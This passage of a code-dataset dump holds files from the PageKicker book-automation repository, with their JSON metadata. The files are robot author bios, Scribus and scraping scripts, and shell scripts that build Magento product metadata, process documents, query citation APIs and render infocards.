$searchurl > \"fetch/\"$uuid\"/searchresults.xml\"\n" }, { "alpha_fraction": 0.8025974035263062, "alphanum_fraction": 0.8051947951316833, "avg_line_length": 75.80000305175781, "blob_id": "f6138e814c0eccf18eff26fa4607061ce0b17266", "content_id": "3fbb0674955393a114bb60f6705afef879189182", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 385, "license_type": "permissive", "max_line_length": 349, "num_lines": 5, "path": "/conf/jobprofiles/authorbios/Grotius.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Grotius \n\nPageKicker Robot Grotius is fascinated with international law as well as the military history of Northern Europe including the Netherlands, Germany, Italy, and Poland from the Dark Ages to the 7 Years War. He prides himself on his extensive collection of first editions of classics of political theory, including the finest extant copy of LEVIATHAN.\n\n![Hugo Grotius](grotius.jpg)\n\n" }, { "alpha_fraction": 0.826347291469574, "alphanum_fraction": 0.826347291469574, "avg_line_length": 166, "blob_id": "3e3d2ab77cbb78f08865b70658323c097a6dc843", "content_id": "c9f150d9cd3eef47c92a21a4467c6bddf40fd150", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 167, "license_type": "permissive", "max_line_length": 166, "num_lines": 1, "path": "/conf/jobprofiles/imprints/prsoop/prsoop_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "The Open Ontology Project's shared social ontology family tree of knowledge.enables learners to participate in the creation of a global body of knowledge in context.\n" }, { "alpha_fraction": 0.7405247688293457, "alphanum_fraction": 0.7405247688293457, "avg_line_length": 23.5, "blob_id": "948f176e57da450c9a2690d1f84ee4672042be78", "content_id": "93d4d333cacd11e39b402e04b7ec7a419300fd7e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "permissive", "max_line_length": 74, "num_lines": 14, "path": "/scripts/bin/google-hot-trends.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\nfrom BeautifulSoup import BeautifulSoup\nimport urllib.request, urllib.error, urllib.parse,re\n\ncont=urllib.request.urlopen('http://www.google.com/trends/hottrends?sa=X')\n#use google.co.in for india searches\n\nsoup = BeautifulSoup(cont)\n\ncol= soup.findAll('a',href=re.compile('.+sa=X'))\n\nfor x in col:\n print(x.string)\n" }, { "alpha_fraction": 0.5939849615097046, "alphanum_fraction": 0.6721804738044739, "avg_line_length": 19.387096405029297, "blob_id": "d71e15a9e6f807f8fb3ef1c117507a248190f195", "content_id": "899936ca180ff242adf3d4894d6ed9e20fad9f6f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 61, "num_lines": 31, "path": "/scripts/bin/scribus-add-layers.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport scribus\r\nfrom scribus import *\r\nimport math \r\n\r\n\r\nscribus.setUnit(2)\r\n\r\n\r\nstartMsg1 = \"This script automates some simple setup taskss.\"\r\n\r\nstartMsg = startMsg1\r\n\r\n#sets colors (no need to import color palette any longer)\r\n\r\n\r\ndefineColor(\"Nimble Maroon\", 0, 100, 100, 55)\r\ndefineColor(\"Nimble Napoleonic Green\", 73, 0, 78, 73) \r\ndefineColor(\"Nimble Blue\", 100, 67, 0, 62) \r\ndefineColor(\"Nimble Feldgrau\", 60, 40, 51, 43) \r\ndefineColor(\"Nimble Metallic Gold\", 44, 47, 78, 20) \r\ndefineColor(\"Nimble Reference Red\", 0, 100, 100, 0)\r\n\r\ncreateLayer(\"Cover\")\r\n\r\ncreateLayer(\"ISBN_Box\")\r\n\r\n\r\ncreateLayer(\"ISBN\")\r\n\r\n" }, { "alpha_fraction": 0.8309115171432495, "alphanum_fraction": 0.8309115171432495, "avg_line_length": 756, "blob_id": "076604e1d9c63b20b8b20c23eb7865a23352bf1a", "content_id": "86f0c555d7a805ef3f1460e7d705beb247be9f3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 757, "license_type": "permissive", "max_line_length": 756, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/TimmyTIA.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Panopticanus is a robot member of the PageKicker team who is a \"wannabe\" Total Information Awareness robot. While Panopticanus and all the members of the PageKicker team scrupulously observe the highest ethical and legal standards regarding the protection of privacy, copyright, and trademark, it must be admitted that some robots, just like some people, have a nosy streak. Panopticanus delights in monitoring government publications and determining topics that are of interest to the increasingly ubiquitous total surveillance state. Panopticanus takes pride in leveling the playing field by providing readers, authors, and publishers with comprehensive access to some of the same topics that are of interest to even slightly Orwellian governments.<p>\n" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 30, "blob_id": "dc5c27d1cf42c4ba33a5bff9fd1c42187223898e", "content_id": "562700b6c40e99768ac9297100c2885d994a492f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "permissive", "max_line_length": 49, "num_lines": 3, "path": "/test/dat-mettan-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# portable test script for DAT\nbin/xform.sh ../test/data ../test/data/mettan.xml\n\n" }, { "alpha_fraction": 0.5031055808067322, "alphanum_fraction": 0.7018633484840393, "avg_line_length": 15.100000381469727, "blob_id": "292291390fd50fed8afc90331d6f066c2388983c", "content_id": "bd6851cc747d0d695cc4f14c1790d99c01b210f2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "permissive", "max_line_length": 30, "num_lines": 20, "path": "/requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "requests>2\nscipy==1.6.2\nWerkzeug==1.0.1\nnltk==3.6.2\nmwclient==0.10.1\nnetworkx==2.5.1\nFlask==1.1.2\nnumpy==1.20.2\nclick>5\npsutil==5.8.0\nbeautifulsoup4==4.9.3\nflickrapi==2.4.0\nhttplib2==0.19.1\nipython==7.22.0\npyPdf==1.13\npython_twitter==3.5\nscikit_learn==0.24.1\ntwilio==6.57.0\nwatson_developer_cloud==2.10.1\nwikipedia==1.4.0\n" }, { "alpha_fraction": 0.7053965926170349, "alphanum_fraction": 0.7173036336898804, "avg_line_length": 26.6180362701416, "blob_id": "6067cb3f2b2ed02b1ce245cd35d8c2d54dfc58c4", "content_id": "b59748094c8cd8247c4d9848aebaefb091461421", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 10414, "license_type": "permissive", "max_line_length": 349, "num_lines": 377, "path": "/scripts/includes/dat-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "sku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\n\necho \"starting to write DAT metadata to \" $metadatatargetpath$uuid/\"current-import.csv\" | tee --append $sfb_log\necho \"current sku is \"$sku | tee --append $xform_log\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nnews_from_date=$createtime\n\n(( news_from_date = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from_date +'%m/%d/%y%n %H:%M:%S'`\n\n(( news_to_date = createtime + 7862400 ))\n\nnews_to_date=`date -d @$news_to_date +'%m/%d/%y%n %H:%M:%S'`\n\n# Adjust the timestamp above by number of minutes given\n\nminutes=$special_lasts_minutes\n\nspecial_lasts_sec=$(( $minutes * 60))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec >> $sfb_log\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" $special_to >> $sfb_log\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\necho \"book is new from at \" $news_from_date >> $sfb_log\n\necho \"book is no longer new at \" $news_to_date >> $sfb_log\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n#store\n\necho -n \"admin,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"base,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"Default,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"downloadable,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#sku\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# 16 is Document Analysis Reports category\n\necho -n \"16,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#name based on seed terms\n\nproductnamefull=\"$uploaded_tat_file\"\nproductname=`echo \"$productnamefull\"|colrm 20`\nproductname=$productname\"...\"\necho \"productname is\" $productname\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url key n/a\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift message available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\n\necho -n \"Analysis of $productname\" \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta description\n\necho -n \"Analysis of $productname,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n#image filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small image filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#thumbnail filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# options container\n\necho -n \"Product Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#samples title \n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links title \n\necho -n \"Document Analysis Results,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#url below\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# image label below\n\necho -n \"Analysis of $productname cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Analysis of $productname small cover,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Analysis of $productname thumbnail,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n#custom design below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"no layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#. includes/pricing.sh\n\necho -n \"0.00\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Results of Document Analysis Tools on the file $productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#short description below\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \"Results of Document Analysis Tools on the file $productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#meta words below\n\necho -n '\"'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# . includes/keyword-reader\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n ',' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#custom layout update below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status below\n\necho -n \"Enabled,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# taxable class\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# catalog visibility\n\necho -n '\"Catalog, Search\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable google checkout\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#links purchased separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#minimum quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured minimum quantity\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#is the quantity decimal?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# will backorders be accepted\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration for backorders?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the minimum sale quantity?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#use configured value for min sale qty?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the maximum sale quantity?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured value for maximum sale quantity?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is the product in stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a low stock date?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should we notify on given stock quantity\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"current-import.csv\"\n\n# use configuration value on notifying stock quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage the stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration value for managing stock?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should the stock status be changed automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the product name\n\necho -n \"Document Analysis Results\" \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a special store id\n\necho -n \"'0',\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n# what is the product type id?\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\t\n# has the product status changed?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the value of product_changed_websites\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier prices\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#associated products\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#adwords grouped \n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#downloadable options\n\n# note that file path is relative to media/import because that's where Magento (not SFB) assumes the file will be\n\nlink1name=\"Poster_Sized_Word_Cloud\"\nlink2name=\"Candidate_Acronyms\"\nlink3name=\"Readability_Report\"\nlink4name=\"Keywords\"\nlink5name=\"Automatic_Summary\"\nlink6name=\"All_Images_Montage\"\nlink7name=\"Top_N_Images_Montage\"\nfilename1=\"$sku\"wordcloudbig.png\nfilename2=\"$sku\"acronyms.txt\nfilename3=\"$sku\"rr.pdf\nfilename4=\"$sku\"all_nouns.txt\nfilename5=\"$sku\"summary.txt\nfilename6=\"$sku\"montage.jpg\nfilename7=\"$sku\"montagetopn.jpg\n\npipe=\"|\"\n\nif [ \"$montageur_success\" = 0 ] ; then\n\n\techo \"montageur ran successfully so adding links for montages to metadata\" | tee --append $xform_log\n\n\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5$pipe$link6name,0,9,file,$uuid/$filename6$pipe$link7name,0,9,file,$uuid/$filename7'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\nelse\n\n\techo \"montageur did not run successfully so not adding links for montages\" | tee --append $xform_log\n\n\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nfi\n\n# echo additional columns\n\n# \"super_attribute_pricing\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"product_tags\"\n\n# . includes/keyword-reader\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"custom_design\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"page_layout\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"gift_message_available\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadplus_serialnr_inactive\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadable_additional_clogin\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadable_link_emaildeliver\"\n#echo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \"finished writing metadata for this Document Analysis Report\" | tee --append $sfb_log\n\n# increment SKU by 1\nprevsku=$sku\nsku=$((sku+1)) \necho $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\necho \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\" \n\n\necho \"wrote metadata to \"$metadatatargetpath$uuid\"/current-import.csv\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.7313997745513916, "alphanum_fraction": 0.7313997745513916, "avg_line_length": 31.95833396911621, "blob_id": "9f694e846ac75dd6e3cefcb1bf7ef2b18fa21fb6", "content_id": "5e78ebc2da8d86132466a4906de7015f5e121467", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 793, "license_type": "permissive", "max_line_length": 79, "num_lines": 24, "path": "/scripts/includes/stopwords-switcher.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bashv\n\n# selecting stopfile \n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"de\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/de/stopwords-german.txt\"\nelif [ \"$wikilang\" = \"fr\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/fr/stopwords-french.txt\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\necho \"we are using language-specific stopfile $stopfile\"\n\nif cmp -s \"$stopfile $scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating selected stopfile into place\"\n\tcp $stopfile \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi \n\n" }, { "alpha_fraction": 0.5453821420669556, "alphanum_fraction": 0.5859872698783875, "avg_line_length": 56.09090805053711, "blob_id": "384c1895321bda154af002d01b1d9ef3412d0015", "content_id": "b6712c36d215020461f883cb8921f866dff78f32", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1256, "license_type": "permissive", "max_line_length": 497, "num_lines": 22, "path": "/scripts/includes/Tiphys-document-parser.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Tiphys document parser\n\n# extracts citations from State of the Literature reviews\n\n# prioritize BibTex\n\nwhile read inputline; do\n\n\texacttitle=`grep -v \"booktitle=\" | grep \"title={\" | sed 's/title={//g;s/},//g'`\n\n\techo $exacttitle\n\techo \"exacttitle is\" $exacttitle | tee --append $tiphys_log\n# convert special characters occurring in the seed to their unicode equivalents for submission as $safeseed inside search query URL\n\n\n\tsafetitle=$(echo $exacttitle | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 's/\\//%2f/g' -e 's/:/%3a/g' -e 's/;/%3b/g' -e 's//%3e/g' -e 's/?/%3f/g' -e 's/@/%40/g' -e 's/\\[/%5b/g' -e 's/\\\\/%5c/g' -e 's/\\]/%5d/g' -e 's/\\^/%5e/g' -e 's/_/%5f/g' -e 's/`/%60/g' -e 's/{/%7b/g' -e 's/|/%7c/g' -e 's/}/%7d/g')\n\n\techo \"safetitle is \" $safetitle | tee --append $tiphys_log\n\n\tcurl --compressed --retry 2 --retry-delay 5 --retry-max 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/mendeley/$searchterm.json http://api.mendeley.com/oapi/documents/search/$safetitle?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\ndone<tmp/input.bib\n" }, { "alpha_fraction": 0.7053719162940979, "alphanum_fraction": 0.7136363387107849, "avg_line_length": 32.15068435668945, "blob_id": "171b88228d66a515236fece16b0130a0133ccc81", "content_id": "c6b5bd40ec06a27ea67863e21cd6c74ad228279c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2420, "license_type": "permissive", "max_line_length": 178, "num_lines": 73, "path": "/scripts/includes/doc-processor.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nprocessthisdir=\"tmp/$uuid/\"\n\n# processes arbitrary collection of files found in the fetched directory and creates ebook\n\necho \"userdata directory is\" $userdatadir\n\nif [ \"$userdatadir\" = \"none\" ] ; then\n\n\techo \"no user files provided\"\n\nelse\n\t# echo flat directories only for now -- in future, support directory userdata via find command\n\t# cp -R \"$userdatadir\" tmp/$uuid/user\n\tcp \"$userdatadir\"/* tmp/$uuid/user\n\techo \"user provided files are\"\n\tls -la tmp/$uuid/user\n\n\t# process docs in user-submitted folder \n\n\tfor file in $processthisdir/user/*\n\tdo\n\tebook-convert $file $file\"fromuser.txt\" --pretty-print\n\tunoconv -f $file.html $file\n\tpython includes/PKsum.py $file\"fromuser.txt\" -l \"$summary_length\"--output=$file\".summary\"\n\tdone\n\ncat \"$processthisdir\"user/*.html > $processthisdir/cumulative.html\ncat \"$processthisdir\"user/*.txt > $processthisdir/cumulative.txt\ncat \"$processthisdir\"user/*.summary > $processthisdir/all.summary.txt\n\nfi\n\n# xmlstarlet sel -t -v \"/api/parse/@*\" tmp/$uuid/$count.xml > tmp/$uuid/$count.html\n\n# process docs in wiki download folder and turn them into html and txt\n\nfor file in \"$processthisdir\"wiki/*.json\ndo\ncat $file | lib/jshon/jshon -e parse -e text -u | sed 's|<a[^>]* href=\"[^\"]*/|<a href=\"http://en.wikipedia.org/wiki/|g' > $file.html\nebook-convert $file.html $file.txt --pretty-print\npython includes/PKsum.py $file.txt -l \"$summary_length\" --output=$file.summary\ndone\n\n# echo building word cloud files\n\n\nfor file in $processthisdir/wiki/\ndo \n $JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 1800 -h 2700 < $file > $file\".cloudbase.png\" 2> /dev/null\ndone\n\ncat \"$processthisdir\"wiki/*.html >> $processthisdir/cumulative.html\ncat \"$processthisdir\"wiki/*.txt >> $processthisdir/cumulative.txt\ncat \"$processthisdir\"wiki/*.summary > $processthisdir/all.summary.txt\n\nunformattedwordcount=`wc -w < tmp/$uuid/cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/cumulative.txt | sed -e :a -e 's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' ` # this adds commas for presentation\necho \"unformattedwordcount is\" $unformattedwordcount\necho \"wordcount is \" $wordcount\n\nfor file in $processthisdir\"flickr/*.jpg\"\ndo\nxres=$(identify -format \"%[fx:resolution.x]\" $file)\nyres=$(identify -format \"%[fx:resolution.y]\" $file)\necho \"xres is\" $xres\necho \"yres is\" $yres\nif [ \"$xres\" -eq \"72\" ] ; then\n\techo \"xres is 72\"\nfi\n\ndone\n" }, { "alpha_fraction": 0.6556350588798523, "alphanum_fraction": 0.6681573987007141, "avg_line_length": 27.66666603088379, "blob_id": "188c245db0d4a6fccf8620e8a4c0000bc70e3af8", "content_id": "e06e4d5e9f69466d8946c57cfa948032dbe39364", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1118, "license_type": "permissive", "max_line_length": 105, "num_lines": 39, "path": "/test/builder_w_skyscraper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\npwd\necho \"**** BOOK BUILDER ***\"\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\necho -n \"pwd is \"\npwd\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n#echo \"$@\"\n$scriptpath\"bin/builder.sh\" -T \"booktitle\" -J \"default\" -S \"Paella\" --passuuid \"$uuid\" --skyscraper \"yes\"\ncp $TMPDIR$uuid/*.epub $TMPDIR\"/delivery.epub\"\ncp $TMPDIR$uuid/4stdout.txt $TMPDIR\"/4stdout.txt\"\nif [ ! -f \"$TMPDIR$uuid/ebookcover.jpg\" ]; then\n echo \"error: cover not found! at \"$TMPDIR$uuid\"/ebookcover.jpg\" > \"$TMPDIR$uuid/error.log\"\nfi\nexit 0\n# if error log is empty then PASS\necho \"\\n\"\necho \"PASS\" \" $uuid\" | tee -a $LOCAL_DATA/logs/error.log\n" }, { "alpha_fraction": 0.7338767051696777, "alphanum_fraction": 0.7558469176292419, "avg_line_length": 54.33333206176758, "blob_id": "0baaa6d28bbb72e693d3691d6f5674b0e27bfb19", "content_id": "8cf2785cf48a89e89539332c82f94b59b6e4bf26", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2822, "license_type": "permissive", "max_line_length": 240, "num_lines": 51, "path": "/scripts/includes/1000x3000skyscraper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "convert -units pixelsperinch -density 300 -size 1000x200 -background blue -fill Yellow -gravity center -font \"$toplabelfont\" caption:\"$booktitle\" $TMPDIR$uuid/toplabel1.png\nsed -i '1i # Important Proper Nouns and Key Terms' \"$TMPDIR\"$uuid/all_nouns.txt\nsed -i '1i \\' \"$TMPDIR\"$uuid/all_nouns.txt\nsed -i G \"$TMPDIR\"$uuid/all_nouns.txt\necho '\\pagenumbering{gobble}' > $TMPDIR$uuid/all_nouns_sky.txt\necho \" \" >> $TMPDIR$uuid/all_nouns_sky.txt\nsed -n 1,25p $TMPDIR$uuid/all_nouns.txt >> $TMPDIR$uuid/all_nouns_sky.txt\ncp \"$TMPDIR\"$uuid/all_nouns.txt \"$TMPDIR\"$uuid/all_nouns.md\ncp \"$TMPDIR\"$uuid/all_nouns_sky.txt \"$TMPDIR\"$uuid/all_nouns_sky.md\n\necho -e '\\pagenumbering{gobble}\\n' | cat - $TMPDIR$uuid/sources.md > /tmp/out && mv /tmp/out $TMPDIR$uuid/sources.md\n\n# make pdf\n\ncat $TMPDIR$uuid/topics_covered.md $TMPDIR$uuid/pp_summary_sky.md $TMPDIR$uuid/sources.md | pandoc --latex-engine=xelatex --template=$confdir\"pandoc_templates/nonumtemplate.tex\" -o $TMPDIR$uuid/infocard.pdf -V \"geometry:paperheight=22.0in\"\n\n# make png\n/usr/bin/convert $TMPDIR$uuid/infocard.pdf -density 400 -trim 